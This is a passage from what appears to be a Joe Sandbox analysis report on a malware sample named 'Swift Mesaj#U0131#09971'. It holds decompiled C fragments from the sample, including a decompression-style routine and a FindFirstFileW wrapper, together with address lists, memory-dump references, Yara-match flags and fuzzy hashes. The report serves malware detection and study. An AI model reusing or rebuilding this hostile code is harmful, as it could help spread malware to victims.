								_t65 =  &_a28; // 0x432170
								_t283 = _t282 - 1;
								_t200 =  *_t65 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									_t74 =  &_a28; // 0x432170
									if(_t296 >  *_t74) {
										_t75 =  &_a28; // 0x432170
										_t296 =  *_t75;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_t98 =  &_a28; // 0x432170
										_a5 =  *_t98;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t107 =  &_a28; // 0x432170
									_t225 = _t224 +  *_t107;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t111 =  &_v36; // 0x432170
								_t284 =  *_t111;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432170 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t65 =  &_a28; // 0x432170
										_t283 = _t282 - 1;
										_t200 =  *_t65 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x004072bf
0x004072c7
0x004072cb
0x004072cd
0x004072d0
0x004072d2
0x004072d2
0x004072d4
0x004072db
0x004072dd
0x004072dd
0x004072e3
0x004072f8
0x00407300
0x00407302
0x00407304
0x00407307
0x00407308
0x00407308
0x0040730e
0x00000000
0x00000000
0x00407310
0x00407313
0x00000000
0x00000000
0x00000000
0x00407313
0x00407317
0x0040731a
0x0040731c
0x0040731c
0x0040731f
0x00407325
0x00407326
0x00000000
0x00000000
0x00000000
0x00407326
0x0040732b
0x0040732e
0x00407330
0x00407330
0x00407336
0x00407338
0x00407349
0x0040733c
0x00407340
0x004075e5
0x00000000
0x004075e5
0x00407346
0x00407347
0x00407347
0x0040734f
0x00407352
0x00407356
0x00407358
0x0040735a
0x0040735d
0x00000000
0x00000000
0x00407365
0x0040736b
0x0040736d
0x0040736f
0x00407370
0x00407385
0x00407385
0x00407388
0x0040738a
0x0040738a
0x0040738c
0x00407391
0x00407393
0x0040739a
0x0040739c
0x004073a4
0x004073a4
0x004073a6
0x004073a7
0x004073b6
0x004073ba
0x004073be
0x004073c1
0x004073c4
0x004073c9
0x004073cc
0x004073d2
0x004073d9
0x004073df
0x004075d8
0x004075d8
0x004075dd
0x004075ec
0x00000000
0x00000000
0x00000000
0x004075dd
0x004073ec
0x004073ef
0x004073f2
0x004073f5
0x004073f9
0x00000000
0x00000000
0x00407404
0x00407404
0x00407407
0x00407408
0x0040740a
0x00407410
0x00407413
0x00000000
0x00000000
0x00407419
0x0040741a
0x0040741d
0x00407420
0x00407423
0x00407426
0x00407429
0x0040742b
0x0040742b
0x0040742b
0x00407433
0x00407437
0x0040743c
0x00407461
0x00407467
0x00407469
0x0040746b
0x0040746e
0x00407477
0x00000000
0x00000000
0x0040743e
0x0040743e
0x00407447
0x0040744b
0x00000000
0x00000000
0x0040745c
0x0040745c
0x0040745f
0x00000000
0x00000000
0x0040744f
0x00407452
0x00407454
0x00407458
0x00000000
0x00000000
0x0040745a
0x0040745a
0x00000000
0x0040745c
0x00407480
0x00407486
0x00407490
0x00407492
0x00407497
0x00407499
0x004074cf
0x0040749b
0x0040749b
0x0040749e
0x004074a1
0x004074a8
0x004074ab
0x004074ae
0x004074b5
0x004074c0
0x004074c7
0x004074c7
0x004074d1
0x004074d4
0x004074d6
0x004074d6
0x004074dc
0x004074dc
0x004074e5
0x004074e8
0x004074e8
0x004074ed
0x004074fc
0x00407504
0x00407509
0x0040752d
0x00407535
0x00407539
0x0040753f
0x0040750b
0x00407519
0x0040751c
0x00407522
0x00407522
0x00407543
0x004074fe
0x004074fe
0x004074fe
0x00407554
0x00407558
0x00407564
0x0040755f
0x00407562
0x00407562
0x0040756c
0x00407571
0x00407579
0x00407575
0x00407577
0x00407577
0x0040757f
0x00407581
0x00407588
0x00407592
0x0040759c
0x004075b8
0x004075bc
0x00407401
0x00407404
0x00407407
0x00407408
0x0040740a
0x00407410
0x00407413
0x00000000
0x00000000
0x00000000
0x00407413
0x00000000
0x00000000
0x00000000
0x00000000
0x0040759e
0x0040759e
0x0040759e
0x004075a3
0x004075ac
0x004075b5
0x00000000
0x004075b5
0x004075c2
0x004075c2
0x004075c5
0x004075cc
0x004075cf
0x00000000
0x004073f2
0x00407372
0x00407374
0x00407374
0x00407378
0x0040737b
0x0040737c
0x0040737c
0x00000000
0x00407374
0x004072e8
0x004072ee
0x00000000

Strings

p!C, xrefs: 00407404, 00407426, 004074D6, 004074A8, 0040742B
p!C, xrefs: 004074E8

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID:
String ID: p!C$p!C
API String ID: 0-3125587631
Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02AF8DC6 Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: <n$]91
API String ID: 0-2229082601
Opcode ID: 2ab53527bbfcb5e8e4e2f5fc294ede9fd2ee775c491cd7667c285071498d530d
Instruction ID: f2f976cb195d6dfde139fe23a772f6073096b04cf5cf1eb8026a282872f97e75
Opcode Fuzzy Hash: 2ab53527bbfcb5e8e4e2f5fc294ede9fd2ee775c491cd7667c285071498d530d
Instruction Fuzzy Hash: 2141AA326022998FEF212F3881803DBBB376F956A0FC14C5DE8C66B108E73404A5CB14

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0122 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 7fd43427c0b8ad097d68798b6fcb3b2410c05b69607baca7a0f56cd6db8ee58e
Instruction ID: f27af2918c26ede991423fe493893fa0678c7b96e75953e65346eed39b4810e0
Opcode Fuzzy Hash: 7fd43427c0b8ad097d68798b6fcb3b2410c05b69607baca7a0f56cd6db8ee58e
Instruction Fuzzy Hash: 6351CD32E2F315CCF7D220F48A907B25162DF12241E528766BF6B625DB7E6E058EC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02B129AC Relevance: 1.6, Strings: 1, Instructions: 328COMMON

Download Yara Rule

Strings

hY:Z, xrefs: 02B12AFD

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: hY:Z
API String ID: 0-313291612
Opcode ID: dd615dd06c6931bd4f6dc1bc7c0b848e28cd0eac7933ac8d03bbdbbe4ee18186
Instruction ID: 89d82a4002019aa7ac188f8cde486f14a20efb2e7aad3eb15d1bac82cceebaf3
Opcode Fuzzy Hash: dd615dd06c6931bd4f6dc1bc7c0b848e28cd0eac7933ac8d03bbdbbe4ee18186
Instruction Fuzzy Hash: 75C14A35A407568FDF349E3889E43DB33E2EF563A0F95422ECC9A87684E7345686C642

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0372 Relevance: 1.6, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: adab337b4f21879e88b977364d3f0ec0260cbf3728355a610257b21531d24f49
Instruction ID: 469e53d25affa234188fac77d1cb4b926baf06840eeb4c9b68c25566101bd325
Opcode Fuzzy Hash: adab337b4f21879e88b977364d3f0ec0260cbf3728355a610257b21531d24f49
Instruction Fuzzy Hash: B5519A22E2F315CCF7D220F48A943B25166CF12251E5287267F6B625DB3E5E098DC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF000B Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 16fb2f3c3bfb9d866ea992a5b1a1c3641cb4dcfa22951ca6a30c6e842cfa877a
Instruction ID: 3f6b45d7c8de5581e58817fca7ccda921b733c11144fadd025924da9d492880d
Opcode Fuzzy Hash: 16fb2f3c3bfb9d866ea992a5b1a1c3641cb4dcfa22951ca6a30c6e842cfa877a
Instruction Fuzzy Hash: AD619826E2F305CCF7D220F489903B25166DF13241E4287677F6B625DB7E6E458EC188

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0212 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 5af971c06b91611ba530ea3aca7de811acc92a6cb2f88f454829e97a6b3a5ec2
Instruction ID: a394083e2a735187e9f48f6697e0be739ac36ae261e6d2f960408b209d550693
Opcode Fuzzy Hash: 5af971c06b91611ba530ea3aca7de811acc92a6cb2f88f454829e97a6b3a5ec2
Instruction Fuzzy Hash: C051AB26E2F315CCF7D220F48A903B25162DF12241E4287667F6B625DB3E6E058EC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E004061C9( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E00406282();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040287a
0x00402895
0x004028a0
0x004028a1
0x004029db
0x0040287c
0x0040287f
0x00402882
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
Opcode Fuzzy Hash: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A

Uniqueness

Uniqueness Score: -1.00%

Function 02AF00B6 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 162133a76eb02a31c2415f558fb6c8ea07b9331545d0e27ea92276a05d868796
Instruction ID: 037947c2a300b1f1166239be9b879a9feb8ed1ea12aec80ada39b04ea2b17ac5
Opcode Fuzzy Hash: 162133a76eb02a31c2415f558fb6c8ea07b9331545d0e27ea92276a05d868796
Instruction Fuzzy Hash: E851BD26E2F315CCF7D220F485903B251A2DF12241E5287677F6B625DB3E5E058EC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF051F Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 65eb20ff119731e7da675fd40386cee456576b47d9c0b319a5e12ee606de8461
Instruction ID: 24f01577e2c75be353090db70f4e73c82b5882b899faef76bbd161a5c73e43a1
Opcode Fuzzy Hash: 65eb20ff119731e7da675fd40386cee456576b47d9c0b319a5e12ee606de8461
Instruction Fuzzy Hash: D9417C22E2E315CCF7D220F489903B25166CF12251D9287277F6B629DB3E5E0A8EC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF07B4 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 9e9f6eb60cd2d20489611aa73d37ab706f92dc98090f7c042e3b31e1ecab679a
Instruction ID: 158ad151d478795b0042aee4249a3196597bf046d8ab44e7305e4207f897b687
Opcode Fuzzy Hash: 9e9f6eb60cd2d20489611aa73d37ab706f92dc98090f7c042e3b31e1ecab679a
Instruction Fuzzy Hash: 36416B22E2E319CCF7D220F489903B661668F12351E9246277F6B529DB3E5D09CDC1CA

Uniqueness

Uniqueness Score: -1.00%

Function 02AF20F8 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

f, xrefs: 02AF2112

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 89b414d39074911e1069b438a7d741447ccf06706203cab41794339f221e5361
Instruction ID: 88f00be27bc06f6c7fae58204230cf54ad4d186a0be6b6d71b057f81809f2f82
Opcode Fuzzy Hash: 89b414d39074911e1069b438a7d741447ccf06706203cab41794339f221e5361
Instruction Fuzzy Hash: D9817730604306CFDF289E6885B57EB23AA9F45394FD5817FDE8787245DB26C886CB06

Uniqueness

Uniqueness Score: -1.00%

Function 02AF032A Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 139b04a0596ee738529a48e944ad46812e24612141931d72efd80d0e99b3d768
Instruction ID: a798645f1523d16c784e3277b3fc6a36ce1f90466dbf60edbdde06251c30d7d7
Opcode Fuzzy Hash: 139b04a0596ee738529a48e944ad46812e24612141931d72efd80d0e99b3d768
Instruction Fuzzy Hash: 5E519B22E2F315CCF7D220F48A943B251A6CF12241D5287277F6B625DB3E5E0A8EC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF074A Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: e897bf7e72dc1fe58ea7cceb727f6d24787c5856016ddd49724a067b407ea778
Instruction ID: 0721073d1f03a4425157c8c5d3f53e208a964e3b43dbff81543d36543591cd9e
Opcode Fuzzy Hash: e897bf7e72dc1fe58ea7cceb727f6d24787c5856016ddd49724a067b407ea778
Instruction Fuzzy Hash: 1C416C22E2E319CCF7D220F489903B26166CF12351D928727BF6B525DB3E5D098EC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0002 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 3ecb291b07141ce7e61c396d1f1c2f4077b63937555e58f1ab994524230064c2
Instruction ID: 82e57fc672f4412d49eb2526fe3003c62877358327647d9cc0403702365c8bd7
Opcode Fuzzy Hash: 3ecb291b07141ce7e61c396d1f1c2f4077b63937555e58f1ab994524230064c2
Instruction Fuzzy Hash: E4519A26E2F315C8F7D220F489903B291A6CF13241D5287677F6B625DB3E6E068EC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF05EA Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 3404a10a49ff809ca52130af8a693510b669ccf760e435be93bbdff5b0ea8659
Instruction ID: 3942fd2682efe335b3c52f6f33b6ec30f71d6c214e8d5458febe4ff742043646
Opcode Fuzzy Hash: 3404a10a49ff809ca52130af8a693510b669ccf760e435be93bbdff5b0ea8659
Instruction Fuzzy Hash: 42419C22E2E315CCF7E220F489903B25166CF12351E8287277F6B528DB7E5E058EC1C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF04DD Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: ab54595f6df71cd934d7604ef4d53a0acc74448f1be29ebbace877b5220de96c
Instruction ID: ea5549c960191e5e87da96fe9a0dd14821f2e5f532042e5b5b3e12221538ecb3
Opcode Fuzzy Hash: ab54595f6df71cd934d7604ef4d53a0acc74448f1be29ebbace877b5220de96c
Instruction Fuzzy Hash: 6E517D32E2E315CCF7E220F48A903B251A6CF12251D5287277F6B625DB3E5E098DC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF048A Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 85c5b06076eec20855f2e9f32eeb59d7340ae2cc8b36156f4430e5256d941a69
Instruction ID: 5d0f4e73a9adceb97d9cfdfabd1699d1e5667ac2fb0487d8e0b056409934628a
Opcode Fuzzy Hash: 85c5b06076eec20855f2e9f32eeb59d7340ae2cc8b36156f4430e5256d941a69
Instruction Fuzzy Hash: 3C518C22E2E315CCF7D220F48A903B251A6CF12251E5287277F6B525DB3E5E098DC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF042A Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: b586195adfc81b692ebe8c99ef02093115461e049b3b72462f1fb7ac75215c09
Instruction ID: f86470883e1fe1a9ccd6b64895126dbbe5876e76490e77e4efa2d4fe4cf609a7
Opcode Fuzzy Hash: b586195adfc81b692ebe8c99ef02093115461e049b3b72462f1fb7ac75215c09
Instruction Fuzzy Hash: BE518B32E2F315CCF7D220F48A943B251A6CF12251E5287267F6B525DB3E5E098EC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF03EB Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 6ee17b36459ef1f671bd0f70e7df8d5edb964ec5e59519d258fb8f0f0bcedb77
Instruction ID: 5b0355c9aad91f66d7cfafcbd1b77813b520a748d756b971627a367eddd11c29
Opcode Fuzzy Hash: 6ee17b36459ef1f671bd0f70e7df8d5edb964ec5e59519d258fb8f0f0bcedb77
Instruction Fuzzy Hash: 9151AA26E2F315CCF7D220F48A903B25566CF12241E428726BF6B625DB7E5E098EC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6C0B Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

U, xrefs: 02AF6C0D

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

